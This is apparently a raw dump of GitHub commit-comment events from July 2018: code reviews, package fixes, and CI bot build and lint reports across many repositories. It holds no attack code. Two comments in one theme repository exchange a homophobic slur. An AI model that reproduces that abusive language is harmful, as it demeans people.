{"id":"8038625544","type":"CommitCommentEvent","actor":{"login":"samhernandez"},"repo":{"name":"craftcms/docs"},"payload":{"comment":{"id":29889413,"position":null,"line":null,"path":null,"commit_id":"6989d3c3f3ee16e613783f49d3c76850d669d247","created_at":"2018-07-30T15:52:40Z","updated_at":"2018-07-30T15:52:40Z","author_association":"CONTRIBUTOR","body":"@brandonkelly heads up on this change. I don't think anything needs to change on class ref docs."}},"created_at":"2018-07-30T15:52:40Z"}
{"id":"8038627164","type":"CommitCommentEvent","actor":{"login":"yanggis"},"repo":{"name":"yanggis/ChinaTunnel"},"payload":{"comment":{"id":29889419,"position":null,"line":null,"path":null,"commit_id":"0ae948a18c62e2d9a9a23d2fcf4d4c3399de66b1","created_at":"2018-07-30T15:52:55Z","updated_at":"2018-07-30T15:52:55Z","author_association":"OWNER","body":"是新机器吗？"}},"created_at":"2018-07-30T15:52:55Z"}
{"id":"8038631645","type":"CommitCommentEvent","actor":{"login":"ajones-rvbd"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29889431,"position":11,"line":11,"path":"testing/frr/APKBUILD","commit_id":"6c21984c5b86ca03c72a88927f8c1de0c420e25f","created_at":"2018-07-30T15:53:37Z","updated_at":"2018-07-30T15:53:37Z","author_association":"CONTRIBUTOR","body":"Fixed in latest push, thank you..."}},"created_at":"2018-07-30T15:53:37Z"}
{"id":"8038632050","type":"CommitCommentEvent","actor":{"login":"DeniX142"},"repo":{"name":"SleekZ/custombdthemesleekz"},"payload":{"comment":{"id":29889434,"position":null,"line":null,"path":null,"commit_id":"a3bbd08ed8f4b4508e9508ce2a25ef903ac76e7e","created_at":"2018-07-30T15:53:41Z","updated_at":"2018-07-30T15:53:41Z","author_association":"NONE","body":"ur a **fag**"}},"created_at":"2018-07-30T15:53:41Z"}
{"id":"8038632377","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29889435,"position":null,"line":null,"path":null,"commit_id":"63e9f0f94a355ae690560849e4717159e099e5eb","created_at":"2018-07-30T15:53:44Z","updated_at":"2018-07-30T15:53:44Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-567](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-567).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-567-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-30T15:53:44Z"}
{"id":"8038633342","type":"CommitCommentEvent","actor":{"login":"ajones-rvbd"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29889438,"position":31,"line":31,"path":"testing/frr/APKBUILD","commit_id":"6c21984c5b86ca03c72a88927f8c1de0c420e25f","created_at":"2018-07-30T15:53:53Z","updated_at":"2018-07-30T15:53:53Z","author_association":"CONTRIBUTOR","body":"Yep, fixed in latest push, thank you..."}},"created_at":"2018-07-30T15:53:53Z"}
{"id":"8038633550","type":"CommitCommentEvent","actor":{"login":"gongcheng122"},"repo":{"name":"gongcheng122/MyProject1"},"payload":{"comment":{"id":29889439,"position":null,"line":null,"path":null,"commit_id":"2d73bceef9d8af9be7b22aba8f67e712bbe0708f","created_at":"2018-07-30T15:53:55Z","updated_at":"2018-07-30T15:53:55Z","author_association":"OWNER","body":"Add c=a>b?a:b"}},"created_at":"2018-07-30T15:53:55Z"}
{"id":"8038633719","type":"CommitCommentEvent","actor":{"login":"csomor"},"repo":{"name":"wxWidgets/wxWidgets"},"payload":{"comment":{"id":29889441,"position":null,"line":null,"path":null,"commit_id":"24dbe9775c1901b24a514ead28923227922b30af","created_at":"2018-07-30T15:53:57Z","updated_at":"2018-07-30T15:53:57Z","author_association":"CONTRIBUTOR","body":"Could you please give a short sample code / diff to an existing sample so that I can try to reproduce. This change improved rendering images correctly, so perhaps I can switch something else."}},"created_at":"2018-07-30T15:53:57Z"}
{"id":"8038634377","type":"CommitCommentEvent","actor":{"login":"ShadowsWithinMe"},"repo":{"name":"Toonkit/Website"},"payload":{"comment":{"id":29889446,"position":null,"line":null,"path":null,"commit_id":"4969cb115d6d893838fa8c7dfe071a6e30862c1f","created_at":"2018-07-30T15:54:04Z","updated_at":"2018-07-30T15:54:04Z","author_association":"NONE","body":"I thought you might like to know that the link is broken. ;)"}},"created_at":"2018-07-30T15:54:04Z"}
{"id":"8038634964","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29889452,"position":136,"line":109,"path":"RockPaperScissors.sol","commit_id":"e5e5f0de640c408ce0742728aea97f664c8667f2","created_at":"2018-07-30T15:54:10Z","updated_at":"2018-07-30T15:54:10Z","author_association":"OWNER","body":"oh ok -  i thought `storage` on line 94 reads all the values into cheap memory (which is the stack i think)"}},"created_at":"2018-07-30T15:54:10Z"}
{"id":"8038638336","type":"CommitCommentEvent","actor":{"login":"SleekZ"},"repo":{"name":"SleekZ/custombdthemesleekz"},"payload":{"comment":{"id":29889458,"position":null,"line":null,"path":null,"commit_id":"a3bbd08ed8f4b4508e9508ce2a25ef903ac76e7e","created_at":"2018-07-30T15:54:45Z","updated_at":"2018-07-30T15:54:45Z","author_association":"OWNER","body":"ur an ultra fag"}},"created_at":"2018-07-30T15:54:45Z"}
{"id":"8038639783","type":"CommitCommentEvent","actor":{"login":"chrissxYT"},"repo":{"name":"chrissxYT/CWishlist_win"},"payload":{"comment":{"id":29889461,"position":null,"line":null,"path":null,"commit_id":"68ace5c1cb5691258f260074f25569d65d4a9f00","created_at":"2018-07-30T15:55:00Z","updated_at":"2018-07-30T15:55:00Z","author_association":"OWNER","body":"test*"}},"created_at":"2018-07-30T15:55:00Z"}
{"id":"8038640496","type":"CommitCommentEvent","actor":{"login":"junyingjy"},"repo":{"name":"yanggis/ChinaTunnel"},"payload":{"comment":{"id":29889464,"position":null,"line":null,"path":null,"commit_id":"0ae948a18c62e2d9a9a23d2fcf4d4c3399de66b1","created_at":"2018-07-30T15:55:09Z","updated_at":"2018-07-30T15:55:09Z","author_association":"NONE","body":"机器是买新的，用了一段时间了"}},"created_at":"2018-07-30T15:55:09Z"}
{"id":"8038640531","type":"CommitCommentEvent","actor":{"login":"dmolineus"},"repo":{"name":"contao/contao-manager"},"payload":{"comment":{"id":29889465,"position":6,"line":null,"path":"api/Task/Manager/SelfUpdateTask.php","commit_id":"e134c102c5064eb4d86d328c55eae3bb9841c9ae","created_at":"2018-07-30T15:55:09Z","updated_at":"2018-07-30T15:55:09Z","author_association":"NONE","body":"Shouldn't it be `getNewVersion()`?"}},"created_at":"2018-07-30T15:55:09Z"}
{"id":"8038643087","type":"CommitCommentEvent","actor":{"login":"ajones-rvbd"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29889470,"position":19,"line":19,"path":"testing/frr/frr","commit_id":"6c21984c5b86ca03c72a88927f8c1de0c420e25f","created_at":"2018-07-30T15:55:34Z","updated_at":"2018-07-30T15:55:34Z","author_association":"CONTRIBUTOR","body":"I removed the exec and retested and that was fine.  Not sure what is \"wrong\" about calling into the upstream script.  I'm happy to fixup any impedence mismatches between the upstream and openrc interfaces, but I don't know of any right now..."}},"created_at":"2018-07-30T15:55:34Z"}
{"id":"8038645780","type":"CommitCommentEvent","actor":{"login":"ajones-rvbd"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29889480,"position":6,"line":6,"path":"testing/frr/frr.post-deinstall","commit_id":"6c21984c5b86ca03c72a88927f8c1de0c420e25f","created_at":"2018-07-30T15:56:01Z","updated_at":"2018-07-30T15:56:01Z","author_association":"CONTRIBUTOR","body":"Fixed in latest push, thanks for comments, the aport is much cleaner and simpler now..."}},"created_at":"2018-07-30T15:56:01Z"}
{"id":"8038646825","type":"CommitCommentEvent","actor":{"login":"ajones-rvbd"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29889482,"position":4,"line":4,"path":"testing/frr/frr.pre-deinstall","commit_id":"6c21984c5b86ca03c72a88927f8c1de0c420e25f","created_at":"2018-07-30T15:56:13Z","updated_at":"2018-07-30T15:56:13Z","author_association":"CONTRIBUTOR","body":"Fixed in latest push, thanks..."}},"created_at":"2018-07-30T15:56:13Z"}
{"id":"8038647563","type":"CommitCommentEvent","actor":{"login":"yanggis"},"repo":{"name":"yanggis/ChinaTunnel"},"payload":{"comment":{"id":29889483,"position":null,"line":null,"path":null,"commit_id":"0ae948a18c62e2d9a9a23d2fcf4d4c3399de66b1","created_at":"2018-07-30T15:56:20Z","updated_at":"2018-07-30T15:56:20Z","author_association":"OWNER","body":"加我微信我远程帮你看看，yanggissg"}},"created_at":"2018-07-30T15:56:20Z"}
{"id":"8038647589","type":"CommitCommentEvent","actor":{"login":"gitmate-bot"},"repo":{"name":"coala/coala-quickstart"},"payload":{"comment":{"id":29889484,"position":null,"line":null,"path":null,"commit_id":"9dadffe44f606f0691f14cb9df3236284847145a","created_at":"2018-07-30T15:56:20Z","updated_at":"2018-07-30T15:56:20Z","author_association":"NONE","body":"Comment on 9dadffe44f606f0691f14cb9df3236284847145a.\n\nThere are 19 results for the section all.autopep8. They have been shortened and will not be shown inline because they are more than 10.\n\n| Message | File | Line |\n|---|---|---|\n| The code does not comply to PEP8. | coala_quickstart/generation/Settings.py | 55 |\n| The code does not comply to PEP8. | coala_quickstart/generation/Settings.py | 59 |\n| The code does not comply to PEP8. | coala_quickstart/generation/Settings.py | 65 |\n| The code does not comply to PEP8. | coala_quickstart/generation/Settings.py | 69 |\n| E305 expected 2 blank lines after class or function definition, found 1 | coala_quickstart/generation/Settings.py | 55 |\n| E227 missing whitespace around bitwise or shift operator | coala_quickstart/generation/Settings.py | 55 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 55 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 56 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 56 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 56 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 59 |\n| E113 unexpected indentation | coala_quickstart/generation/Settings.py | 60 |\n| E227 missing whitespace around bitwise or shift operator | coala_quickstart/generation/Settings.py | 65 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 65 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 66 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 66 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 66 |\n| E225 missing whitespace around operator | coala_quickstart/generation/Settings.py | 69 |\n| E113 unexpected indentation | coala_quickstart/generation/Settings.py | 70 |\n\nUntil GitMate provides an online UI to show a better overview, you can run [coala](https://coala.io/) locally for more details."}},"created_at":"2018-07-30T15:56:20Z"}
{"id":"8038649043","type":"CommitCommentEvent","actor":{"login":"ajones-rvbd"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29889489,"position":10,"line":10,"path":"testing/frr/frr.pre-install","commit_id":"6c21984c5b86ca03c72a88927f8c1de0c420e25f","created_at":"2018-07-30T15:56:35Z","updated_at":"2018-07-30T15:56:35Z","author_association":"CONTRIBUTOR","body":"Went  through a few and tried to copy the pattern, hopefully fixed in latest push..."}},"created_at":"2018-07-30T15:56:35Z"}
{"id":"8038649856","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29889490,"position":17,"line":17,"path":"Lesson3/train.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T15:56:43Z","updated_at":"2018-07-30T15:56:43Z","author_association":"NONE","body":"Просто присвоить скорости новое значение. Суть моего коментария в том, что возможность присваивания скорости не должна быть открыта коду использующему Train. То есть на нужен метод внутри класса Train, который будет принимать коэффициент увеличения скорости и именно внутри этого метода коэффициент будет складываться с уже существующей скоростью."}},"created_at":"2018-07-30T15:56:43Z"}
{"id":"8038658467","type":"CommitCommentEvent","actor":{"login":"junyingjy"},"repo":{"name":"yanggis/ChinaTunnel"},"payload":{"comment":{"id":29889524,"position":null,"line":null,"path":null,"commit_id":"0ae948a18c62e2d9a9a23d2fcf4d4c3399de66b1","created_at":"2018-07-30T15:58:08Z","updated_at":"2018-07-30T15:58:08Z","author_association":"NONE","body":"加了"}},"created_at":"2018-07-30T15:58:08Z"}
{"id":"8038665674","type":"CommitCommentEvent","actor":{"login":"yanggis"},"repo":{"name":"yanggis/ChinaTunnel"},"payload":{"comment":{"id":29889548,"position":null,"line":null,"path":null,"commit_id":"0ae948a18c62e2d9a9a23d2fcf4d4c3399de66b1","created_at":"2018-07-30T15:59:19Z","updated_at":"2018-07-30T15:59:19Z","author_association":"OWNER","body":"OK，看到了。"}},"created_at":"2018-07-30T15:59:19Z"}
{"id":"8038666677","type":"CommitCommentEvent","actor":{"login":"Yasir-siddiqui"},"repo":{"name":"lzzy12/tgbot"},"payload":{"comment":{"id":29889552,"position":null,"line":null,"path":null,"commit_id":"61b526548080b03fe2ce5ed76912394411149470","created_at":"2018-07-30T15:59:28Z","updated_at":"2018-07-30T15:59:28Z","author_association":"NONE","body":"Bc"}},"created_at":"2018-07-30T15:59:28Z"}
{"id":"8038667291","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29889555,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-30T15:59:34Z","updated_at":"2018-07-30T15:59:34Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 157](https://teamcity.otenv.com/viewLog.html?buildId=9031314&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) is now running\n"}},"created_at":"2018-07-30T15:59:34Z"}
{"id":"8038668428","type":"CommitCommentEvent","actor":{"login":"paulcor"},"repo":{"name":"wxWidgets/wxWidgets"},"payload":{"comment":{"id":29889558,"position":9,"line":2018,"path":"src/generic/graphicc.cpp","commit_id":"3f18576deede6554f8eefebbfc0b29f80387f006","created_at":"2018-07-30T15:59:45Z","updated_at":"2018-07-30T15:59:45Z","author_association":"CONTRIBUTOR","body":"It doesn't make sense to have a compile-time check here, the code will compile with any version of Cairo."}},"created_at":"2018-07-30T15:59:45Z"}
{"id":"8038669327","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29889561,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-30T15:59:54Z","updated_at":"2018-07-30T15:59:54Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 158](https://teamcity.otenv.com/viewLog.html?buildId=9031315&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) is now running\n"}},"created_at":"2018-07-30T15:59:54Z"}
{"id":"8038671347","type":"CommitCommentEvent","actor":{"login":"Aaronius"},"repo":{"name":"Aaronius/HTMLHint"},"payload":{"comment":{"id":29889566,"position":null,"line":null,"path":null,"commit_id":"957b75eb75fa70c5dc777d4f57f40bf5972d1da1","created_at":"2018-07-30T16:00:15Z","updated_at":"2018-07-30T16:00:15Z","author_association":"OWNER","body":"For posterity, this commit was made for this pull request: https://github.com/yaniswang/HTMLHint/pull/218\r\n\r\nTo fix this issue: https://github.com/yaniswang/HTMLHint/issues/217"}},"created_at":"2018-07-30T16:00:15Z"}
{"id":"8038676540","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29889583,"position":null,"line":null,"path":null,"commit_id":"c62076f5771846bdf54e397f205eee5596d37a8c","created_at":"2018-07-30T16:01:02Z","updated_at":"2018-07-30T16:01:02Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-98](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-98).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-98-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-30T16:01:02Z"}
{"id":"8038677405","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29889588,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-30T16:01:12Z","updated_at":"2018-07-30T16:01:12Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 157](https://teamcity.otenv.com/viewLog.html?buildId=9031314&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) outcome was **SUCCESS**\nSummary: Tests passed: 15 Build time: 00:01:38"}},"created_at":"2018-07-30T16:01:12Z"}
{"id":"8038677439","type":"CommitCommentEvent","actor":{"login":"lzzy12"},"repo":{"name":"lzzy12/tgbot"},"payload":{"comment":{"id":29889590,"position":null,"line":null,"path":null,"commit_id":"61b526548080b03fe2ce5ed76912394411149470","created_at":"2018-07-30T16:01:12Z","updated_at":"2018-07-30T16:01:12Z","author_association":"OWNER","body":":3"}},"created_at":"2018-07-30T16:01:12Z"}
{"id":"8038679444","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29889597,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-30T16:01:33Z","updated_at":"2018-07-30T16:01:33Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 158](https://teamcity.otenv.com/viewLog.html?buildId=9031315&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) outcome was **SUCCESS**\nSummary: Tests passed: 15 Build time: 00:01:39"}},"created_at":"2018-07-30T16:01:33Z"}
{"id":"8038688420","type":"CommitCommentEvent","actor":{"login":"Yasir-siddiqui"},"repo":{"name":"lzzy12/tgbot"},"payload":{"comment":{"id":29889629,"position":null,"line":null,"path":null,"commit_id":"61b526548080b03fe2ce5ed76912394411149470","created_at":"2018-07-30T16:03:08Z","updated_at":"2018-07-30T16:03:08Z","author_association":"NONE","body":"BC kaha gaya?"}},"created_at":"2018-07-30T16:03:08Z"}
{"id":"8038689472","type":"CommitCommentEvent","actor":{"login":"jalovkj"},"repo":{"name":"jalovkj/website"},"payload":{"comment":{"id":29889633,"position":null,"line":null,"path":null,"commit_id":"ade640e64fae6de9471301654ff244533ccea290","created_at":"2018-07-30T16:03:18Z","updated_at":"2018-07-30T16:03:18Z","author_association":"OWNER","body":"Associating with #3 with this commit."}},"created_at":"2018-07-30T16:03:18Z"}
{"id":"8038690297","type":"CommitCommentEvent","actor":{"login":"Yasir-siddiqui"},"repo":{"name":"lzzy12/tgbot"},"payload":{"comment":{"id":29889636,"position":null,"line":null,"path":null,"commit_id":"61b526548080b03fe2ce5ed76912394411149470","created_at":"2018-07-30T16:03:26Z","updated_at":"2018-07-30T16:03:26Z","author_association":"NONE","body":"Kya hogaya?"}},"created_at":"2018-07-30T16:03:26Z"}
{"id":"8038694590","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29889642,"position":null,"line":null,"path":null,"commit_id":"ce033af8f4259cfbe8521101fae6293bb218c3c8","created_at":"2018-07-30T16:04:10Z","updated_at":"2018-07-30T16:04:10Z","author_association":"NONE","body":"159125973_Issue#6843 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2333 of 2333 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ce033af8f4259cfbe8521101fae6293bb218c3c8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ce033af8f4259cfbe8521101fae6293bb218c3c8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ce033af8f4259cfbe8521101fae6293bb218c3c8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.22%25-green.png)</a>\n"}},"created_at":"2018-07-30T16:04:10Z"}
{"id":"8038695001","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/Products.statusmessages"},"payload":{"comment":{"id":29889644,"position":null,"line":null,"path":null,"commit_id":"36b6024b323c419919320819543235c7e4e405c7","created_at":"2018-07-30T16:04:14Z","updated_at":"2018-07-30T16:04:14Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-Products.statusmessages/31/violations\n```\nProducts/statusmessages/tests/test_adapter.py:35:15: D001 found directlyProvides( replace it with zope.interface.provider\nProducts/statusmessages/tests/test_adapter.py:221:0: P102 docstring does contain unindexed parameters\nProducts/statusmessages/tests/test_adapter.py:241:15: D001 found directlyProvides( replace it with zope.interface.provider\nProducts/statusmessages/tests/test_adapter.py:308:0: P102 docstring does contain unindexed parameters\nProducts/statusmessages/tests/test_encoding.py:15:38: C812 missing trailing comma\nProducts/statusmessages/tests/test_encoding.py:33:9: F401 'Products.statusmessages.message.Message' imported but unused\nProducts/statusmessages/tests/test_encoding.py:76:29: E203 whitespace before ','\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-30T16:04:14Z"}
{"id":"8038696029","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29889649,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-30T16:04:24Z","updated_at":"2018-07-30T16:04:24Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 202](https://teamcity.otenv.com/viewLog.html?buildId=9031334&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) is now running\n"}},"created_at":"2018-07-30T16:04:24Z"}
{"id":"8038697220","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29889656,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-30T16:04:36Z","updated_at":"2018-07-30T16:04:36Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 203](https://teamcity.otenv.com/viewLog.html?buildId=9031335&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) is now running\n"}},"created_at":"2018-07-30T16:04:36Z"}
{"id":"8038702702","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29889668,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-30T16:05:30Z","updated_at":"2018-07-30T16:05:30Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 202](https://teamcity.otenv.com/viewLog.html?buildId=9031334&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 9 Build time: 00:01:06"}},"created_at":"2018-07-30T16:05:30Z"}
{"id":"8038702715","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29889669,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-30T16:05:31Z","updated_at":"2018-07-30T16:05:31Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 234](https://teamcity.otenv.com/viewLog.html?buildId=9031338&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) is now running\n"}},"created_at":"2018-07-30T16:05:31Z"}
{"id":"8038702981","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29889671,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-30T16:05:33Z","updated_at":"2018-07-30T16:05:33Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 235](https://teamcity.otenv.com/viewLog.html?buildId=9031339&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) is now running\n"}},"created_at":"2018-07-30T16:05:33Z"}
{"id":"8038703268","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29889672,"position":null,"line":null,"path":null,"commit_id":"9b04538a7f603fa4011f680d598065b79a4cc5aa","created_at":"2018-07-30T16:05:37Z","updated_at":"2018-07-30T16:05:37Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-MacOS-10.9-clang: OK (2949 of 2952 tests passed, 0 test warnings)\n\nMessages:\n\n * 3 tests had: EIO diffs.\n * 3 tests had: Table big diffs.\n * 2 tests had: ESO big diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 621\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9b04538a7f603fa4011f680d598065b79a4cc5aa-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9b04538a7f603fa4011f680d598065b79a4cc5aa-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-30T16:05:37Z"}
{"id":"8038704868","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-filterorder"},"payload":{"comment":{"id":29889680,"position":null,"line":null,"path":null,"commit_id":"2e228a0c50f6175c0f0f26a7dbdee54902c716b1","created_at":"2018-07-30T16:05:53Z","updated_at":"2018-07-30T16:05:53Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-filterorder :: BuildTest [Build 49](https://teamcity.otenv.com/viewLog.html?buildId=9031340&buildTypeId=ArchitectureTeam_JavaPlatform_OtjFilterorder_BuildTest) is now running\n"}},"created_at":"2018-07-30T16:05:53Z"}
{"id":"8038704905","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29889682,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-30T16:05:54Z","updated_at":"2018-07-30T16:05:54Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 203](https://teamcity.otenv.com/viewLog.html?buildId=9031335&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 9 Build time: 00:01:14"}},"created_at":"2018-07-30T16:05:54Z"}
{"id":"8038705571","type":"CommitCommentEvent","actor":{"login":"dsyer"},"repo":{"name":"dsyer/spring-cloud-function"},"payload":{"comment":{"id":29889686,"position":161,"line":161,"path":"spring-cloud-function-webflux/src/main/java/org/springframework/cloud/function/web/flux/RequestProcessor.java","commit_id":"42966fc8ed271b8503861ca6f53ece2d0678506b","created_at":"2018-07-30T16:06:00Z","updated_at":"2018-07-30T16:06:00Z","author_association":"OWNER","body":"> Should all of this if/else be delegated to StringConverter?\r\n\r\nNo, that's not the purpose of the `StringConverter`. It is used to decode a URL path element from an HTTP GET into a function argument. The logic above is to do with the body of a POST."}},"created_at":"2018-07-30T16:06:00Z"}
{"id":"8038706617","type":"CommitCommentEvent","actor":{"login":"ciscoheat"},"repo":{"name":"cambiata/fb-stack"},"payload":{"comment":{"id":29889689,"position":12,"line":12,"path":"src/ui/content/ShelfView.hx","commit_id":"821580a7f61d421f2d1c061ae68062e762678204","created_at":"2018-07-30T16:06:11Z","updated_at":"2018-07-30T16:06:11Z","author_association":"COLLABORATOR","body":"No need to use `return` in methods returning `m(...)` or an Array of `m(...)`!"}},"created_at":"2018-07-30T16:06:11Z"}
